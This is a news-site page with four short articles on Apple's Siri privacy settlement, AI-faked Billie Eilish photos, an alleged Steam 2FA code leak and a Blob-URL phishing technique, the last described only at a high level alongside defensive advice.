Connect with us

Cybersecurity

Apple’s $95M Siri Privacy Settlement Approved: How to Claim Your Share

Published

on

Apple Siri privacy settlement claim process

Apple has received final approval for a $95 million settlement to resolve a class action lawsuit alleging that its Siri voice assistant violated user privacy by recording private conversations without consent. The settlement, approved on May 7, 2025, by a U.S. District Judge in Oakland, California, addresses claims that Siri inadvertently captured and shared user conversations between September 17, 2014, and December 31, 2024. Eligible Apple users can now claim up to $100, as the company navigates the fallout from this privacy controversy amid growing scrutiny of AI-driven technologies.

The lawsuit, Lopez v. Apple Inc., stemmed from allegations that Siri activated unintentionally on devices like iPhones, iPads, and Apple Watches, recording private conversations without users saying the “Hey Siri” trigger phrase. These recordings were allegedly shared with third-party contractors, leading to privacy violations. According to the official settlement website, eligible users who owned a Siri-enabled device during the specified period and experienced accidental activations can claim $20 per device, up to five devices, totaling a maximum of $100. However, the payout may be adjusted based on the number of claims submitted by the July 2, 2025, deadline.

To file a claim, users must visit the settlement website and provide their contact information, along with either proof of purchase or the serial and model numbers of their Siri-enabled devices. Those who received a notice via email or postcard can use their Notice ID and Confirmation Code to streamline the process. Alternatively, users can opt for a “New Claim” if they believe they qualify but didn’t receive a notice. Payment options include direct deposit or electronic check, and the final approval hearing on August 1, 2025, will confirm the distribution of funds. This settlement follows Apple’s efforts to address user trust concerns, including changes made in 2019 to suspend human grading of Siri responses and make audio sample training an opt-in process.

The lawsuit highlighted specific instances of privacy breaches, such as users receiving targeted ads after discussing products like Air Jordan sneakers or medical treatments in private conversations. While Apple has denied any wrongdoing, the company settled to avoid costly litigation, which could have resulted in damages up to $1.5 billion if the case had gone to trial. The $95 million settlement, though significant, represents less than a day’s profit for Apple, which reported a net income of $93.74 billion in its latest fiscal year. This case is part of a broader wave of scrutiny over voice assistants, with a similar lawsuit against Google’s Voice Assistant pending in a California federal court, reflecting growing concerns about data privacy in AI technologies.

For users, the settlement offers a chance to seek compensation for privacy violations, but it also underscores the importance of understanding how voice assistants handle data. Apple has since implemented stricter privacy measures, such as on-device processing for Siri requests and limiting third-party access to recordings. However, the incident serves as a reminder of the risks associated with always-listening devices, prompting users to review their privacy settings and consider disabling Siri if concerns persist. Resources like Apple’s privacy guides can help users manage their device settings to enhance digital security.

The Siri settlement marks a significant moment in the ongoing debate over privacy in AI-driven devices, highlighting the need for transparency and user control in voice assistant technologies. As the July 2, 2025, claim deadline approaches, eligible Apple users are encouraged to act quickly to secure their share of the settlement. For those opting out, the deadline to retain the right to sue Apple independently is also July 2, 2025, as detailed on the settlement website. What are your thoughts on Apple’s Siri settlement, and how has it impacted your trust in voice assistants? Share your perspective in the comments—we’d love to hear your insights on this privacy milestone.

Liam Chen is a cybersecurity analyst with a background in information security and risk management. He has worked with various organizations to enhance their cyber defense strategies. At BriskFeeds, Liam reports on cyber threats, data protection, and the intersection of technology and security policies.

Cybersecurity

Billie Eilish AI Fakes Flood Internet: Singer Slams “Sickening” Doctored Met Gala Photos

Published

on

Billie Eilish AI Fakes: Singer Denounces Doctored Met Gala Pics

Billie Eilish AI fakes are the latest example of deepfake technology running rampant, as the Grammy-winning singer has publicly debunked viral images claiming to show her at the 2025 Met Gala. Eilish, who confirmed she did not attend the star-studded event, called the AI-generated pictures “sickening,” highlighting the growing crisis of celebrity image misuse and online misinformation in the USA and beyond.

LOS ANGELES, USA – The internet was abuzz with photos seemingly showing Billie Eilish at the 2025 Met Gala, but the singer herself has forcefully shut down the rumors, revealing the Billie Eilish AI fakes were entirely fabricated. In a recent social media statement, Eilish confirmed she was nowhere near the iconic fashion event and slammed the AI-generated images as “sickening.” This incident throws a harsh spotlight on the rapidly escalating problem of deepfake technology and the unauthorized use of celebrity likenesses, a concern increasingly impacting public figures and stirring debate across the United States.

The fake images, which depicted Eilish in various elaborate outfits supposedly on the Met Gala red carpet, quickly went viral across platforms like X (formerly Twitter) and Instagram. Many fans initially believed them to be real, underscoring the sophisticated nature of current AI image generation tools. However, Eilish took to her own channels to set the record straight. “Those are FAKE, that’s AI,” she reportedly wrote, expressing her disgust at the digitally manipulated pictures. “It’s sickening to me how easily people are fooled.” Her frustration highlights a growing unease about how AI can distort reality, a problem also seen with other AI systems, such as Elon Musk’s Grok AI spreading misinformation.

This latest instance of Billie Eilish AI fakes is far from an isolated event. The proliferation of deepfake technology, which uses artificial intelligence to create realistic but fabricated images and videos, has become a major concern. Celebrities are frequent targets, with their images often used without consent in various contexts, from harmless parodies to malicious hoaxes and even non-consensual pornography. The ease with which these fakes can be created and disseminated poses a significant threat to personal reputation and public trust. The entertainment industry is grappling with AI on multiple fronts, including stars urging for copyright protection against AI.

The “Sickening” Reality of AI-Generated Content

Eilish’s strong condemnation of the Billie Eilish AI fakes reflects a broader sentiment among artists and public figures who feel increasingly vulnerable to digital manipulation. The incident raises critical questions about:

  • Consent and Likeness: The unauthorized use of a person’s image, even if AI-generated, infringes on their rights and control over their own persona.
  • The Spread of Misinformation: When AI fakes are believable enough to dupe the public, they become potent tools for spreading false narratives.
  • The Difficulty in Detection: As AI technology advances, telling real from fake becomes increasingly challenging for the average internet user. This is a concern that even tech giants are trying to address, with OpenAI recently committing to more transparency about AI model errors.

The Met Gala, known for its high fashion and celebrity attendance, is a prime target for such fabrications due to the intense public interest and the visual nature of the event. The Billie Eilish AI fakes serve as a stark reminder that even high-profile events are not immune to this form of digital deception. The potential for AI to be misused is a widespread concern, touching various aspects of life, including the use of AI by police forces.

Legal and ethical frameworks are struggling to keep pace with the rapid advancements in AI. While some jurisdictions are beginning to explore legislation to combat malicious deepfakes, the global and often anonymous nature of the internet makes enforcement difficult. For victims like Billie Eilish, speaking out is one of the few recourses available to debunk the fakes and raise awareness. As AI becomes more integrated into content creation, the lines between authentic and synthetic media will continue to blur, making critical thinking and media literacy more important than ever for consumers. The public’s desire for authenticity is also pushing for clearer identification, like the calls for AI chatbots to disclose their non-human status.

What are your thoughts on the rise of AI-generated fakes and their impact on celebrities and public trust? Share your comments below and follow Briskfeeds.com for ongoing coverage of AI, technology, and misinformation.

Continue Reading

Cybersecurity

Alleged 89 Million Steam 2FA Codes Leaked, Twilio Denies Breach

Published

on

Alleged 89 Million Steam 2FA Codes Leaked Online

On May 14, 2025, an alleged database containing 89 million Steam 2FA (two-factor authentication) codes surfaced online, prompting immediate attention. This incident, which has not been verified by official sources, marks a significant event in the realm of digital security.

The alleged leak claimed to include sensitive details such as Steam account names, email addresses, and 2FA codes. These codes, crucial for securing user accounts, were said to be part of a database advertised on a hacking forum for $5,000. The data reportedly contained historic SMS text messages with one-time passcodes, including recipient phone numbers, confirmation codes for account access, and metadata like timestamps and delivery statuses. If authentic, this information could expose users to phishing attacks and session hijacking, where hackers might intercept or replay 2FA codes to bypass login protections.

Following the emergence of these claims, Twilio, a communications platform reportedly involved, denied any breach. The company stated that it found no evidence of a breach on its systems, dismissing the notion that the data originated from their platforms. This denial is significant, as Twilio provides authentication services for many platforms, including Steam. The incident, if verified, could have far-reaching consequences, prompting a reevaluation of how cybersecurity measures are implemented.

As of now, Steam, operated by Valve Corporation, has not yet commented on the alleged breach. This lack of response left users uncertain about the safety of their accounts, amplifying concerns about personal information and account security. The incident highlights the broader challenge of maintaining user trust in an era where digital threats are increasingly sophisticated, especially as AI-driven public safety tools continue to evolve.

The ongoing focus is on verifying the leak’s authenticity and understanding its implications. This event serves as a stark reminder of the importance of robust cybersecurity in the age of AI, prompting a reevaluation of how these technologies are deployed. What are your thoughts on the alleged Steam 2FA code leak and Twilio’s denial—does it signal a broader issue with online security, or is it an isolated incident? Share your insights in the comments; we’re eager to hear your perspective on this developing story.

Continue Reading

Cybersecurity

New Phishing Attack Uses Blob URLs to Steal Passwords

Published

on

Phishing attack Blob URLs steal passwords

Cybercriminals have developed a sophisticated phishing technique that leverages Blob URLs to create fake login pages within users’ browsers, stealing passwords and even encrypted messages, according to a Hackread report. This method, uncovered by Cofense Intelligence, bypasses traditional email security systems by generating malicious content locally, making it nearly undetectable. As phishing attacks grow more advanced, this new tactic highlights the urgent need for updated defenses and user awareness to protect sensitive data.

The attack begins with a phishing email that appears legitimate, often redirecting users through trusted platforms like Microsoft’s OneDrive before leading them to a fake login page. Unlike typical phishing sites hosted on external servers, these fake pages are created using Blob URLs—temporary local content generated within the user’s browser. TechRadar explains that because Blob URLs are not hosted on the public internet, security systems that scan emails for malicious links cannot easily detect them. The result is a convincing login page that captures credentials, such as passwords for tax accounts or encrypted messages, as detailed by Forbes. This stealthy approach mirrors trends in AI-driven cyber threats, where attackers exploit technology to evade detection.

Cofense Intelligence, as reported by Security Boulevard, first detected this technique in mid-2022, but its use has surged recently. The phishing campaigns often lure users with prompts to log in to view encrypted messages, access tax accounts, or review financial alerts, exploiting trust in familiar brands. Cybersecurity News highlights that Blob URLs start with “blob:http://” or “blob:https://”, a detail users can check to identify potential threats. However, the complexity of these attacks makes them hard to spot, especially since AI-based security tools are still learning to differentiate between legitimate and malicious Blob URLs, a challenge also seen in AI privacy debates about evolving tech risks.

Protecting against this threat requires a multi-layered approach. Experts recommend avoiding clicking on links in unsolicited emails, especially those prompting logins, and verifying URLs directly with trusted sources. Using two-factor authentication (2FA) can add an extra layer of security, even if credentials are stolen. Organizations should also invest in advanced email security solutions that can detect unusual redirect patterns, as traditional Secure Email Gateways (SEGs) often fail to catch these attacks, per Security Boulevard. These protective measures align with strategies in AI communication tools, which aim to secure user interactions in digital spaces.

The broader implications of Blob URL phishing are significant. As remote work and digital transactions increase, the risk of credential theft grows, potentially leading to financial fraud or data breaches. The digital divide further complicates the issue, as not all users have the tools or knowledge to recognize such threats, a concern echoed in AI accessibility efforts. Additionally, the misuse of legitimate technologies like Blob URLs—commonly used by services like YouTube for temporary video storage—underscores the need for better regulation, a topic often discussed in AI language tool discussions about ethical tech deployment.

This new phishing tactic serves as a wake-up call for both users and security providers. As cybercriminals continue to innovate, staying ahead requires constant vigilance, improved technology, and widespread education on digital safety. The rise of Blob URL attacks highlights the evolving nature of cyber threats and the importance of proactive defense strategies. What do you think about this sneaky phishing method—how can we better protect ourselves online? Share your thoughts in the comments—we’d love to hear your perspective on this growing cybersecurity challenge.

Continue Reading

Most Popular